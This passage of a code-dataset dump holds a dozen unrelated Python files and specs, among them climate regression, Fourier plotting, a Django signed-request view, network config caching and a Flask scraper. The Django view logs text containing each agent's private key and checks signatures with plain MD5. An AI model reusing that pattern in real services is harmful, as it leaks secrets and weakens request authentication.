content, name\r\n\r\n def get_all_pages(self):\r\n cursor = self.db.cursor()\r\n data = cursor.execute(\"select * from pages\")\r\n yield from data\r\n\r\n def close(self):\r\n if self.db:\r\n self.db.close()\r\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565108364","text":"# https://towardsdatascience.com/machine-learning-polynomial-regression-with-python-5328e4e8a386\n# https://towardsdatascience.com/time-series-analysis-and-climate-change-7bb4371021e\n\n# Import the Pandas library\nimport pandas as pd\nimport numpy as np\n# Import Matplotlib\nimport matplotlib.pyplot as plt\nimport io, requests\nimport calendar\nfrom datetime import datetime\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\n\n# Fitting Linear Regression to the dataset\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\n\n# Function definition\ndef populate_df_with_anomolies_from_row(row):\n\tyear = row['Year']\n\t# Anomaly values (they seem to be a mixture of strings and floats)\n # data.iloc[,]\n\tmonthly_anomolies = row.iloc[1:]\n\t# Abbreviated month names (index names)\n\tmonths = monthly_anomolies.index\n\tfor month in monthly_anomolies.index:\n\t\t# Get the last day for each month \n\t\tlast_day = calendar.monthrange(year,datetime.strptime(month, '%b').month)[1]\n\t\t# construct the index with which we can reference our new DataFrame (to populate) \n\t\tdate_index = datetime.strptime(f'{year} {month} {last_day}', '%Y %b %d')\n\t\t# Populate / set value @ above index, to anomaly value\n\t\tt.loc[date_index] = monthly_anomolies[month]\n\t\t\ndef clean_anomaly_value(raw_value):\n\ttry:\n\t\treturn float(raw_value)\n\texcept:\n\t\treturn np.NaN\n\ndef viz_polymonial(X,y):\n plt.scatter(X, y, color='red')\n plt.plot(X, lin_reg.predict(poly_reg.fit_transform(X)), color='blue')\n plt.title('Climate (Polynomial Regression)')\n plt.xlabel('Date')\n plt.ylabel('Temperature')\n plt.show()\n return\n \ndef addTestValues(X, y):\n numero = len(X)\n ultimo = X[numero-1][0]\n result = np.arange('2021-01', '2040-12', dtype='datetime64[M]')\n contador = 0\n for i in result:\n if contador > 0:\n X_new = np.datetime64(i, 'D') - np.timedelta64(1, 'D')\n arrayX = np.array([X_new])\n X = np.append(X, arrayX).reshape(len(X)+1,1)\n y = np.append(y, np.empty([1,1], dtype=object)) \n contador = contador + 1\n viz_polymonial(X, y)\n\n \ndef getX(temp_X):\n result = []\n for i in temp_X:\n temp = []\n temp.append(i)\n result.append(temp)\n return result\n\n# Read in the raw temperature and emissions datasets (they are in CSV format)\nurl = 'https://data.giss.nasa.gov/gistemp/tabledata_v4/GLB.Ts+dSST.csv'\ns = requests.get(url).content\nraw_t = pd.read_csv(io.StringIO(s.decode('utf-8')), skiprows=1)\n#raw_t = pd.read_csv('./data/GLB.Ts+dSST.csv')\n\n# Create new dataframe with an index for each month\n# Last day of each month from 31/01/1880 to 31/12/2018\ndate_rng = pd.date_range(start='1/1/1880', end='1/03/2019', freq='M')\n\n# Next create the empty DataFrame, which we will populate using the actual data\n# each line contains an element of date_rng\n# index increment from 1\nt = pd.DataFrame(date_rng, columns=['date'])\n\n# Create a column for the anomoly values\n# index increment from 1\nt['Avg_Anomaly_deg_C'] = None\n\n# Set the index of the DataFrame to the date column (DateTime index)\nt.set_index('date', inplace=True)\n\n# data.iloc[,]\n#,:13 - da primeira a 13a coluna\n# https://www.shanelynn.ie/select-pandas-dataframe-rows-and-columns-using-iloc-loc-and-ix/\nraw_t = raw_t.iloc[:,:13]\n\n# Apply function to each row of raw data \n_ = raw_t.apply(lambda row: populate_df_with_anomolies_from_row(row), axis=1)\n\n# Apply above function to all anomaly values in DataFrame\nt['Avg_Anomaly_deg_C'] = t['Avg_Anomaly_deg_C'].apply(lambda raw_value: clean_anomaly_value(raw_value))\n\n# 'Forward fill' to take care of NaN values\nt.fillna(method='ffill', inplace=True)\n\ny=np.array(t['Avg_Anomaly_deg_C'].values, dtype=float)\ntemp=np.array(pd.to_datetime(t['Avg_Anomaly_deg_C'], format='%Y%m%d', errors='ignore').index.values)\ntempX = getX(list(temp))\nX=np.array(tempX)\n\npoly_reg = PolynomialFeatures(degree=3)\nX_poly = poly_reg.fit_transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X_poly, y, random_state=0)\nlin_reg = LinearRegression().fit(X_train, y_train)\n\npred_train = lin_reg.predict(X_train)\npred_test = lin_reg.predict(X_test)\nprint('Root mean squared error (train): %.2f' % np.sqrt(mean_squared_error(y_train, pred_train)))\nprint('Coefficient of determination (train): %.2f (1 is perfect) ' % r2_score(y_train, pred_train))\nprint('Root mean squared error (test): %.2f' % np.sqrt(mean_squared_error(y_test, pred_test)))\nprint('Coefficient of determination (test): %.2f (1 is perfect) ' % r2_score(y_test, pred_test))\nprint('R-squared score (training): ', lin_reg.score(X_train, y_train))\nprint('R-squared score (test): ', lin_reg.score(X_test, y_test))\n\naddTestValues(X,y)","sub_path":"polynomialRegressionClimate.py","file_name":"polynomialRegressionClimate.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402949530","text":"# encoding: utf-8\n'''\nCreated on 2015-01-08\n\n@author: xiaowei\n'''\nfrom adminapp.models import Agent\nfrom common.common import decrypt, json_response, \\\n set_request_notice, get_request_notice\nfrom conf import qingsong_conf as qs_conf\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import resolve, Resolver404\nfrom titan.forms import BaseForm\nimport hashlib\nimport logging\nimport os\nimport re\n\n\ndef home(request):\n '''\n All request entry.\n '''\n params = getattr(request, request.method)\n form = BaseForm(params)\n if not form.is_valid():\n return qs_conf.RETURN_ARGUMENT_ERROR\n Access_Key = form.cleaned_data.get('Access_Key', '')\n Request_Key = form.cleaned_data.get('Request_Key', '')\n Request_Notice = form.cleaned_data.get('Request_Notice', '')\n action = form.cleaned_data.get('action', '')\n sign = form.cleaned_data.get('sign', '')\n\n # location the action function by url\n url = '/action/%s/' % action\n try:\n func, args, kwargs = resolve(url)\n except Resolver404:\n return qs_conf.RETURN_COMMAND_DOES_NOT_EXISTS\n\n agents = Agent.objects.filter(access_key=Access_Key)\n if not agents:\n return qs_conf.RETURN_AGENT_DOES_NOT_EXIST\n\n setattr(request, 'Access_Key', Access_Key)\n # add current agent attribute\n setattr(request, 'agent', agents[0])\n\n # check Request_Notice\n # get Request_Notice from memory, key is agent Access_Key\n last_request_notice, request_notice_dict = get_request_notice(\n request.Access_Key)\n if last_request_notice == Request_Notice:\n return qs_conf.REQUEST_REPEAT_ERROR\n # set Request_Notice to memory\n set_request_notice(\n request_notice_dict, {request.Access_Key: Request_Notice})\n\n # check sign\n logger = logging.getLogger(\"[VERIFY SIGN VALUE]\")\n formatter = logging.Formatter(\n '%(name)12s- %(asctime)s %(levelname)-8s %(message)s',\n '%a, %Y-%m-%d %H:%M:%S',)\n file_handler = logging.FileHandler(\n os.path.join(settings.BASE_DIR, \"logs/verify_sign_value.log\"))\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n logger.info('#########################################')\n\n query_list = sorted(['%s=%s' % (k, v)\n for k, v in request.GET.iteritems() if k != 'sign'])\n text = '%s%s' % ('&'.join(query_list), request.agent.private_key)\n make_sign = hashlib.md5(text).hexdigest()\n\n logger.info('the text is %s' % text)\n logger.info('the sign is %s' % sign)\n logger.info('the make sign is %s' % make_sign)\n logger.info('#########################################')\n logger.removeHandler(file_handler)\n\n if make_sign != sign:\n return qs_conf.RETURN_SIGN_ERROR\n\n third_user_info = decrypt(\n Request_Key, request.agent.private_key).split(',')\n if not third_user_info[0].isdigit():\n return qs_conf.RETURN_USER_ID_ERROR\n # check third username format\n r = re.compile(\n \"^.+\\\\@(\\\\[?)[a-zA-Z0-9\\\\-\\\\.]+\\\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\\\]?)$\")\n if not r.match(third_user_info[1]):\n return qs_conf.RETURN_USERNAME_FORMAT_ERROR\n setattr(request, 'third_user_id', third_user_info[0])\n setattr(request, 'third_user_name', third_user_info[1])\n third_username = '%s_%s_%s' % (\n request.agent.id, request.third_user_id, request.third_user_name)\n third_user = User.objects.filter(agent_id=request.agent.id,\n username=third_username,\n third_user_id=request.third_user_id\n )\n\n if action != 'user_register' and not third_user:\n return qs_conf.RETURN_USER_DOES_NOT_EXIST\n if third_user:\n # add third user attribute\n setattr(request, 'third_user', third_user[0])\n kwargs['request'] = request\n return_data = func(*args, **kwargs)\n return_data['action'] = action\n return json_response(return_data)\n","sub_path":"titan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155265053","text":"import utils.utils as util\n\n\ndef translation(pixels, imgSize, x, y):\n pixels = util.convert_1d_to_2d(pixels, imgSize)\n height = imgSize[1]\n width = imgSize[0]\n new_pixels = [[0 for i in range(width)] for j in range(height)]\n for i in range(height):\n for j in range(width):\n if(i+y < height and j-x < width and i+y > 0 and j-x > 0):\n new_pixels[i][j] = pixels[i+y][j-x]\n return new_pixels\n","sub_path":"ops/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497627503","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 27 12:29:44 2018\r\n\r\n@author: kramm\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy\r\n\r\n\r\nL = 25\r\n\"\"\"PICK THESE VALUES\"\"\"\r\nresolution = 1000\r\nN = 10\r\n\"\"\"UP THERE\"\"\"\r\n\r\n\r\nx = np.linspace(-L,L, resolution)\r\n\r\ndef y_values(x_range):\r\n y = []\r\n for x in x_range:\r\n \"\"\"WRITE A FUNCTION HERE\"\"\"\r\n y.append(x)\r\n return y\r\n\r\n\r\ndata = y_values(x)\r\nplt.plot(x,data, color = 'r')\r\n\r\ndef an(data,n):\r\n b = [] \r\n x = [] \r\n for i in range(0,(len(data))):\r\n b.append(np.cos(np.pi * n *i / L))\r\n x.append(i)\r\n integrand = []\r\n\r\n for i in range(0,len(data)):\r\n c = data[i] * b[i]\r\n integrand.append(c)\r\n\r\n integration = scipy.integrate.simps(integrand,x, dx = 2*L/resolution) #spacing in x\r\n an = integration / len(integrand)\r\n #print (\"an\", an)\r\n return (an)\r\n\r\n\r\ndef bn(data,n):\r\n b = [] \r\n x = []\r\n for i in range(0,(len(data))):\r\n b.append(np.sin(np.pi * n *i / L))\r\n x.append(i)\r\n integrand = []\r\n \r\n for i in range(0,len(data)):\r\n c = data[i] * b[i]\r\n integrand.append(c)\r\n \r\n integration = scipy.integrate.simps(integrand,x, dx = 2*L/resolution)\r\n bn = integration / len(integrand)\r\n return (bn)\r\n \r\n\r\ndef fourier_coefficients(N):\r\n a = []\r\n for i in range(0,N):\r\n cn = an(data,i)\r\n a.append(cn)\r\n \r\n b = []\r\n for i in range(0,N):\r\n cn = bn(data, i)\r\n b.append(cn)\r\n \r\n alpha = []\r\n theta = []\r\n \r\n for i in range(0,len(a)):\r\n ALPHA = ((a[i])**2 +(b[i])**2)**0.5\r\n alpha.append(ALPHA)\r\n THETA = np.arctan(b[i]/a[i])\r\n theta.append(THETA)\r\n \r\n return a,b, alpha, theta\r\n\r\na,b,alpha, phi = fourier_coefficients(6)\r\n\r\ndef summation_trig(N,x_value,set_of_an, set_of_bn):\r\n\r\n y_value = []\r\n for i in range(0, N):\r\n y_value_intermediate = []\r\n y_value_intermediate.append(set_of_an[0][i] *np.cos(i*np.pi*x_value/L) + set_of_bn[0][i]*np.sin(i*np.pi*x_value/L))\r\n y_value_final = sum(y_value_intermediate)\r\n y_value.append(y_value_final)\r\n y_value = sum(y_value)\r\n return y_value\r\n\r\n\r\n\r\n\r\ndef plot(N,x):\r\n set_of_an = []\r\n set_of_bn = []\r\n set_of_alpha_n = []\r\n set_of_theta_n = []\r\n \r\n set_of_an.append(fourier_coefficients(N)[0])\r\n set_of_bn.append(fourier_coefficients(N)[1])\r\n set_of_alpha_n.append(fourier_coefficients(N)[2])\r\n set_of_theta_n.append(fourier_coefficients(N)[3])\r\n \r\n \r\n y = []\r\n for i in range(0, len(x)):\r\n y.append(summation_trig(N, x[i],set_of_an, set_of_bn))\r\n xa = []\r\n xb = []\r\n ya = []\r\n yb = []\r\n for i in range(0, len(x)/2):\r\n xa.append(x[i])\r\n yb.append(y[i])\r\n for i in range(len(x)/2 , len(x)):\r\n xb.append(x[i] -2*L/resolution)\r\n ya.append(y[i])\r\n \r\n \r\n fig_1 = plt.figure(1)\r\n fig_1.set_size_inches(7,3)\r\n plt.plot(xa,ya, color = 'b')\r\n plt.plot(xb,yb, color = 'b')\r\n #plt.plot(x,y)\r\n plt.xlim(-L, +L)\r\n \r\n \r\nplot(N,x)\r\n\r\n\r\n ","sub_path":"visuals_maths/Fourier/Mark/General_fourier_series.py","file_name":"General_fourier_series.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33886031","text":"#!/usr/bin/env python\n\n\"\"\"This module display a histogram answering the next question:\nWhich Hogwarts course has a homogeneous score distribution between all four houses.\nRange is homogeneous since the coefficient of variation is less than 0.33.\"\"\"\n\nfrom os import path\nfrom pickle import load\nfrom collections import defaultdict\nfrom math import sqrt\nfrom matplotlib import pyplot\nfrom sys import argv\nimport seaborn\n\ndef read_data(name):\n \"\"\"Read a pickled representation of dict obj from the file.\"\"\"\n\n try:\n p = path.join(path.dirname(path.abspath(__file__)), name)\n f = open(p, 'r')\n d = load(f)\n f.close\n return d\n except Exception as e:\n print('histogram.read_data: %s' % str(e))\n exit(1)\n\ndef homogeneous(stat, content):\n \"\"\"Keep stat and content data and calculate homogeneous for courses\n Draw histograms unsing calculated data.\"\"\"\n\n try:\n for course in stat.keys():\n houses = defaultdict(list)\n score = content[course]\n names = content['Hogwarts House']\n homogeneous = True\n\n i = 0\n while i < len(score):\n if score[i] is not '' and names[i] is not '':\n houses[names[i]].append(score[i])\n i += 1\n\n if not houses:\n homogeneous = False\n\n for key in houses.keys():\n houses[key] = [float(i) for i in houses[key] if i is not '']\n mean = 0\n std = 0\n\n for val in houses[key]:\n mean += val / len(houses[key])\n for val in houses[key]:\n std += ((val - mean) ** 2) / len(houses[key])\n std = sqrt(std)\n coef = abs(std / mean)\n if coef > 0.33:\n homogeneous = False\n\n if homogeneous == True:\n seaborn.set(color_codes=True)\n pyplot.subplots(figsize=(10, 10))\n pyplot.title(course)\n for name, values in houses.items():\n seaborn.distplot(values, label=name);\n pyplot.legend()\n pyplot.show()\n except Exception as e:\n print('homogeneous.read_data: %s' % str(e))\n exit(2)\n\ndef main():\n \"\"\"Usage: histogram.py\"\"\"\n \n if len(argv) == 1:\n content = read_data('.content')\n stat = read_data('.stat')\n\n homogeneous(stat, content)\n else:\n print(main.__doc__)\n exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65422549","text":"#!/usr/bin/python\n# Copyright (c) 2017 Dell Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n#\n# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT\n# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS\n# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.\n#\n# See the Apache Version 2.0 License for specific language governing\n# permissions and limitations under the License.\n\n\"\"\"Module for creation and caching of the VLAN SubInterface specific config objects\"\"\"\n\nimport nas_os_if_utils as nas_if\nimport copy\n\n\nclass VLAN_SUBINTF(object):\n \"\"\"VLAN SUBINTF config object class\"\"\"\n def __init__(self, parent_intf, vlan_id):\n \"\"\"Constructor\"\"\"\n self.parent_intf = parent_intf\n self.vlan_id = vlan_id\n self.name = str(parent_intf) + '.' + str(vlan_id)\n\n\n\"\"\"VLAN SubInterface Object Cache\"\"\"\nVLAN_SUBINTF_MAP = {}\n\ndef cache_get(name):\n \"\"\"Method to get a VLAN SUBINTF configuration object from cache\"\"\"\n if name in VLAN_SUBINTF_MAP:\n return VLAN_SUBINTF_MAP[name]\n return None\n\ndef cache_del(name):\n \"\"\"Method to delete a VLAN SUBINTF configuration object from cache\"\"\"\n if name in VLAN_SUBINTF_MAP:\n del VLAN_SUBINTF_MAP[name]\n return True\n return False\n\ndef cache_update(name, config_obj):\n \"\"\"Method to update a VLAN SUBINTF configuration object in the cache\"\"\"\n cache_del(name)\n return cache_add(name, config_obj)\n\ndef cache_add(name, config_obj):\n \"\"\"Method to add a VLAN SUBINTF configuration object to the cache\"\"\"\n if name not in VLAN_SUBINTF_MAP:\n VLAN_SUBINTF_MAP[name] = config_obj\n return True\n return False\n\n\n\"\"\"VLAN SUBINTF object related attributes\"\"\"\nVLAN_PARENT_INTF_NAME = 'dell-if/if/interfaces/interface/parent-interface'\nVLAN_SUBINTF_VLAN_ID = 'dell-if/if/interfaces/interface/vlan-id'\n\ndef __read_attr(cps_obj, attr_id):\n \"\"\"Method to read a CPS attribute value from the CPS object\"\"\"\n val = None\n try:\n val = cps_obj.get_attr_data(attr_id)\n nas_if.log_info(\"Value of CPS attr %s is %s: \" % \\\n (str(attr_id), str(val)))\n except ValueError:\n nas_if.log_err(\"Failed to read value of the CPS attr %s\" % str(attr_id))\n return val\n\ndef create(cps_obj):\n \"\"\"Method to convert the CPS object into a VLAN SUBINTF configuration object\"\"\"\n\n parent_intf = __read_attr(cps_obj, VLAN_PARENT_INTF_NAME)\n if parent_intf is None:\n return None\n\n cfg_obj = copy.deepcopy(cache_get(parent_intf))\n\n if cfg_obj is None:\n vlan_id = __read_attr(cps_obj, VLAN_SUBINTF_VLAN_ID)\n if vlan_id is None:\n return None\n cfg_obj = VLAN_SUBINTF(parent_intf, vlan_id)\n\n return cfg_obj\n","sub_path":"scripts/lib/python/nas_vlan_subintf_config_obj.py","file_name":"nas_vlan_subintf_config_obj.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588706973","text":"# -*- mode: python -*-\na = Analysis(['T-Rax.py'],\n pathex=['Z:\\Documents\\Programming\\Large Projects\\Spectrometer Stuff\\T-Rax'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='T-Rax.exe',\n debug=False,\n strip=None,\n upx=True,\n console=False)\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='T-Rax')\n","sub_path":"T-Rax.spec","file_name":"T-Rax.spec","file_ext":"spec","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530946313","text":"import os\nimport subprocess\nimport shutil\nimport pandas as pd\nfrom threading import Timer\n\n\ndef cleanup():\n if \"fort.58\" in os.listdir(os.getcwd()):\n os.remove(\"fort.58\")\n if \"fort.59\" in os.listdir(os.getcwd()):\n os.remove(\"fort.59\")\n if \"fort.66\" in os.listdir(os.getcwd()):\n os.remove(\"fort.66\")\n if \"control\" in os.listdir(os.getcwd()):\n os.remove(\"control\")\n\n\nif __name__ == \"__main__\":\n\n dirname = None\n print(\"\\n\\n\\nWhat do you want this run to be called?\")\n runname = raw_input(\">>> \")\n\n if os.path.exists(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname)):\n shutil.rmtree(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname))\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname))\n\n print(\"What is the directory name where input directories are located?\")\n while True:\n inp = raw_input(\">>> \")\n if os.path.exists(os.getcwd() + \"/\" + inp):\n dirname = inp\n print(\"Found directory: \" + os.getcwd() + \"/\" + dirname)\n break\n else:\n print(os.getcwd() + \"/\" + inp + \" not found!\")\n for root, dirs, files in os.walk(os.getcwd() + \"/\" + dirname, topdown=False):\n for dir in dirs:\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir)\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.58\")\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.59\")\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.66\")\n\n for rs, ss, fs in os.walk(os.getcwd() + \"/\" + dirname + \"/\" + dir):\n for f in fs:\n component = None\n if \"BSP\" in f:\n component = \"BSP\"\n elif \"MORB\" in f:\n component = \"MORB\"\n cleanup()\n shutil.copy(os.getcwd() + \"/\" + dirname + \"/\" + dir + \"/\" + f, os.getcwd() + \"/\" + \"control\")\n starcomponent = f.replace(\"HeFESTo_Infile.txt\", \"\").replace(\"HeFESTo_Infile.txt\", \"\")\n p = subprocess.Popen(os.getcwd() + \"/main\", stdin=None, stdout=None)\n t = Timer(800, p.kill)\n t.start()\n p.communicate()\n t.cancel()\n if \"fort.58\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.58\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.58/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n if \"fort.59\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.59\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.59/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n if \"fort.66\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.66\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.66/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n\n","sub_path":"old/runhefesto.py","file_name":"runhefesto.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378388592","text":"import csv\n\ndata_path =\"./survey.csv\"\n\ndef run_main():\n\n male_set = {\"male\", 'm'}\n female_set = {'female', 'f'}\n\n result_dict = {}\n\n with open(data_path,'r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n\n for i, row in enumerate(rows):\n if i == 0:\n continue\n if i % 50 == 0:\n print(\"正在加载{}数据.....\".format(i))\n\n # 性别属性\n gender_var = row[2]\n contry_var = row[3]\n\n gender_var = gender_var.replace(\" \", \"\")\n gender_var = gender_var.lower()\n\n # 判断国家是否存在\n if contry_var not in result_dict:\n result_dict[contry_var] = [0, 0]\n if gender_var in female_set:\n result_dict[contry_var][0] += 1\n elif gender_var in male_set:\n result_dict[contry_var][1] += 1\n else:\n pass\n with open('gender_country.csv','w', newline=\"\", encoding='utf-16') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow([\"国家\", \"女\", \"男\"])\n\n for k, v in list(result_dict.items()):\n csvwriter.writerow([k, v[0], v[1]])\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n run_main()\n","sub_path":"mental/mental.py","file_name":"mental.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474315025","text":"from hstest.check_result import correct\nfrom hstest.dynamic.dynamic_test import dynamic_test\nfrom hstest.dynamic.output.infinite_loop_detector import loop_detector\nfrom hstest.testing.tested_program import TestedProgram\nfrom hstest.testing.unittest.user_error_test import UserErrorTest\n\n\nclass InfiniteLoopTestChar(UserErrorTest):\n contain = \"\"\"\n Error in test #1\n\n Infinite loop detected.\n No input request for the last 5000 characters being printed.\n \"\"\"\n\n @dynamic_test\n def test(self):\n main = TestedProgram('main')\n main.start()\n return correct()\n\n def test_run_unittest(self):\n before = loop_detector.check_no_input_requests_for_long\n loop_detector.check_no_input_requests_for_long = True\n super().test_run_unittest()\n loop_detector.check_no_input_requests_for_long = before\n","sub_path":"tests/outcomes/infinite_loop/infinite_loop_test_char/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"559963647","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 25 00:33:56 2017\n\n@author: Avneesh Srivastava\n\"\"\"\nfrom flask import Flask, jsonify\nimport os\nimport Constants\nfrom flask_compress import Compress\nimport datetime\nfrom scraper_lib.InstagramScraper import InstagramScraper\n#Constants\nlogger = Constants.LOGGER\nport = int(os.getenv(\"VCAP_APP_PORT\") or 5500)\n#Flask App\napp = Flask(__name__)\n#GZIP Compression\nCompress(app)\napp.constants = Constants\na=InstagramScraper()\n\n#Main Health Check Endpoint\n@app.route('/')\ndef health_check():\n\tresponseObject = dict([('status','OK'),('app_name','Instagram Scraper'),('time',datetime.datetime.now())])\n\treturn jsonify(responseObject)\n\n@app.route('/')\ndef getCausecode(username):\n if username is not None:\n username = username.strip()\n return jsonify(a.queryInstagram(username))\n else:\n return jsonify(dict[('error','Invalid Username'),('error_code','INVALID_USERNAME')])\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437008137","text":"from __future__ import print_function\nimport os\nimport os.path as path\nimport subprocess\n\ndoxygen_output_dir = path.abspath(\n os.environ.get('DOXYGEN_OUTPUT_DIR', './doxygen'))\n\ncode_source_dir = path.abspath(\n os.environ.get('CODE_SOURCE_DIR',\n path.join(path.dirname(__file__),\n '..',\n 'include',\n 'observable')))\n\ndocs_source_dir = path.abspath(path.dirname(__file__))\n\n# Sphinx configuration\n\nproject = \"Observable\"\nmaster_doc = 'index'\n\nextensions = ['breathe']\nbreathe_projects = {\n 'observable': doxygen_output_dir\n}\n\nbreathe_default_project = 'observable'\nbreathe_domain_by_file_pattern = {\n '*': 'cpp',\n}\n\n# Doxygen configuration\n\ndef run_doxygen(app):\n \"\"\"Run Doxygen over the library source.\"\"\"\n print(\"Running Doxygen. Input dir is '%s'. Output dir is '%s'.\" % \n (code_source_dir, doxygen_output_dir))\n\n doxygen_conf = [\n 'PROJECT_NAME = \"%s\"' % project,\n 'GENERATE_XML = YES',\n 'INPUT = %s' % code_source_dir,\n 'OUTPUT_DIRECTORY = %s' % doxygen_output_dir,\n 'XML_OUTPUT = %s' % doxygen_output_dir,\n 'RECURSIVE = YES',\n 'GENERATE_HTML = NO',\n 'GENERATE_LATEX = NO',\n 'QUIET = YES',\n 'INLINE_INHERITED_MEMB = YES',\n 'BUILTIN_STL_SUPPORT = YES',\n 'EXTRACT_PRIVATE = YES',\n 'WARN_IF_UNDOCUMENTED = NO',\n ]\n\n proc = subprocess.Popen(['doxygen', '-'],\n stdin=subprocess.PIPE,\n universal_newlines=True)\n proc.communicate('\\n'.join(doxygen_conf))\n proc.wait()\n\ndef setup(app):\n # Run doxygen after Sphinx is initialized.\n app.connect('builder-inited', run_doxygen)","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549751072","text":"import pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport nltk\r\nfrom nltk.sentiment.util import *\r\nfrom func import sentimfunc as stm\r\nfrom func import datavil as dvl\r\nfrom func import blankck as blk\r\nfrom func import classck as clck\r\nfrom func import likecount as lk\r\nfrom func import heatmap as hmp\r\nimport MySQLdb\r\nimport pandas.io.sql as psql\r\n\r\n\r\n# Initialization of variables\r\nneg = 0\r\npos = 0\r\nneu = 0\r\nblank = 0\r\ns = 0\r\nvalues = []\r\nlist = {}\r\n'''\r\nquery1 used to select all the data from the target sql table which isn't already present in the message_new table\r\nquery2 used to insert data into message_new\r\n\r\n'''\r\n# Queries\r\nquery1=\"SELECT * FROM message_table \" \\\r\n \" WHERE message_table.Message_Id \" \\\r\n \" NOT IN (SELECT message_new.Message_Id FROM message_new) \" \\\r\n \" ORDER BY Message_Id\"\r\nquery2 = \"INSERT INTO message_new (sentiment,Category,NA,Difference,Intermediate_Sentiment,Message_Id) VALUES (%s,%s,%s,%s,%s,%s) \"\r\nquery3 = 'SELECT * FROM message_new'\r\n\r\n\r\n# Connecting to the database\r\ndb = MySQLdb.connect( user='root', passwd='password', db='babbles')\r\n\r\n# Using query1 to assign the results to a pandas dataframe\r\ndf1 = psql.read_sql(query1, con=db)\r\n\r\n# Making columns that are local to the data frame and initializing 